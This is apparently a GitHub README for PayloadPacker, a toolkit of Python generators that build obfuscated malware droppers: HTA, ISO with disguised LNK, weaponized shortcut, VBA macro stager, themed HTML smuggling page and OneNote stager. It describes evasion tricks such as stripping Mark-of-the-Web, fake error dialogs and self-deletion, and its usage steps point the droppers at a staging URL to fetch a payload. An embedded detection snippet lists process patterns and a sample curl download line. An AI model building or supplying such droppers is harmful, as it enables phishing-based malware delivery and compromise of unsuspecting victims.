eren717/PayloadPacker

PayloadPacker

Collection of Python generators for common initial access delivery formats. Each script produces a ready-to-use dropper with randomized variable names, string obfuscation, and configurable payload URLs.

What's Included

  • pack_hta.py - HTA dropper that runs via mshta.exe. Downloads payload using XMLHTTP, strips MOTW, shows a fake error dialog, then self-deletes.
  • pack_iso.py - ISO image containing a disguised LNK shortcut + hidden batch launcher + payload. Bypasses MOTW since mounted ISO files don't inherit Zone.Identifier.
  • pack_lnk.py - Weaponized .lnk shortcut with document icon. Uses cmd.exe + curl to download, no PowerShell involved. All metadata zeroed.
  • pack_macro.py - VBA macro stager for .docm/.xlsm. Downloads via WinHTTP, executes through WMI (no cmd.exe in process tree). Variable names and URL strings randomized per generation.
  • pack_smuggle.py - HTML smuggling page with OneDrive/SharePoint/Google Drive/Dropbox themes. Assembles payload client-side via JS blob, bypassing network inspection.
  • pack_one.py - OneNote (.one) file with embedded batch stager. Builds a minimal valid MS-ONE binary.
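
For defenders, several of the formats listed above leave a recognizable parent/child pattern in process-creation telemetry. The following is an added example, not part of PayloadPacker: the event field names, rule names and sample events are constructed for illustration, and the WmiPrvSE.exe parent for WMI-created processes is standard Windows behaviour rather than something this README states.

```python
import re

def base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

SCRIPT_HOSTS = {"cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

# Rule name -> predicate over one process-creation event (field names are assumptions).
RULES = {
    # HTA dropper: a .hta file opened through mshta.exe
    "hta_via_mshta": lambda e: base(e["image"]) == "mshta.exe"
        and re.search(r"\.hta\b", e["cmdline"], re.I),
    # LNK dropper: cmd.exe whose command line runs curl against a URL
    "cmd_curl_download": lambda e: base(e["image"]) == "cmd.exe"
        and re.search(r"\bcurl(\.exe)?\b.*https?://", e["cmdline"], re.I),
    # Macro stager: WMI-created process (parent WmiPrvSE.exe) in a user-writable path
    "wmi_child_in_user_path": lambda e: base(e["parent"]) == "wmiprvse.exe"
        and re.search(r"\\(users|programdata)\\", e["image"], re.I),
    # OneNote stager: OneNote starting a script host
    "onenote_script_child": lambda e: base(e["parent"]) == "onenote.exe"
        and base(e["image"]) in SCRIPT_HOSTS,
}

def classify(event):
    """Return the names of all rules the event matches."""
    return [name for name, pred in RULES.items() if pred(event)]

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\a\Downloads\invoice.hta"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl -s -o %TEMP%\a.exe https://example.invalid/a.exe"},
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Users\a\AppData\Local\Temp\update.exe", "cmdline": "update.exe"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'cmd.exe /c "C:\Users\a\open.bat"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(base(ev["image"]), classify(ev))
```

These are triage heuristics: legitimate administration also uses WMI and curl, so a match needs surrounding context before it becomes an alert.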

Setup

pip install pycdlib   # only needed for pack_iso.py

Usage

Set your staging URL via environment variable, then run any generator:

export PAYLOAD_URL="https://your-staging-server.com/payload.exe"

python pack_hta.py
python pack_iso.py
python pack_lnk.py
python pack_macro.py
python pack_smuggle.py
python pack_one.py

Output goes to the output/ folder. Each run randomizes variable names and string encodings, so no two outputs are identical.

Configuration

All scripts read PAYLOAD_URL from the environment. You can also edit the constants at the top of each file directly:

  • PAYLOAD_URL - where the payload gets downloaded from
  • PAYLOAD_NAME - filename written to disk on the target
  • OUTPUT_DIR / OUTPUT_FILE - where the generated file lands

Some scripts have extra options:

  • pack_smuggle.py: set THEME to onedrive, sharepoint, google_drive, or dropbox
  • pack_smuggle.py: set EMBED_FILE to bake a binary directly into the HTML
  • pack_one.py: set MODE to batch or hta

License

MIT

Disclaimer

For educational and authorized security research only. I am not responsible for any misuse.

Contact

Questions or need help? Discord: eren_._z

About

Modular payload delivery format generators (HTA, ISO, LNK, VBA macro, HTML smuggling, OneNote)
